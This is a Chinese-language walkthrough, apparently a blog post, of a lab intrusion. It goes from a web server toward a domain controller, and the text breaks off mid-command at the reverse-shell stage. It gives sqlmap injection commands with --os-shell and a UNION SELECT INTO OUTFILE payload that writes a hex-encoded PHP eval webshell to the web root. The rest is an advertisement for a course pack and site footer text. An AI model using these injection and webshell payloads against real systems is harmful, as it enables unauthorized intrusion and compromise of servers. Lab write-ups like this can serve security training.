内网渗透横向攻击流程

拓扑环境

1.Kali Linux(攻击机)
2.Centos6.4(web服务器)
3.win7(域成员主机无法上网)
4.win2008R2(域控无法上网)

目的

通过Kali Linux拿到域控权限

2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>点我<一

Web渗透

目录扫描

使用dirbuster工具扫描网站根目录 设置kali默认字典文件 /usr/share/wordlists/dirbuster/directory­list­lowercase­2.3­small.txt

扫描获得phpinfo.php

得到网站绝对路径信息

SQL查询报错

通过测试发现存在sql整型注入报错情况,进一步获取webshell

SQL注入

通过sqlmap测试发现存在sql注入

sqlmap ‐u "http://IP:8888/newsshow.php?cid=4&id=19*" ‐‐dbms MYSQL ‐v3

获取webshell

这里有绝对路径的情况下,可直接写入webshell。这里使用sqlmap os­shell的功能

sqlmap(os­shell)

#通过sqlmap获取命令执行会话 sqlmap ‐u “http://IP/newsshow.php?cid=4&id=19*” ‐‐dbms MYSQL ‐v3 ‐‐os‐ shell`

直接写webshell(pass)

http://IP/newsshow.php?cid=4&id=19 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,0x3c3f706870206576616c28245f504f53545b2770617373275d29 3f3e,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile '/var/www/html/webshell.php'

反弹shell

为了更好做后续操作,进行反弹shell

获取目标系统信息

os‐shell> uname ‐a os‐shell> whereis python`

获取meterpreter会话

由于网站上为linux默认安装python,可直接生成python反弹脚本

#生成python反弹脚本 msfv

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值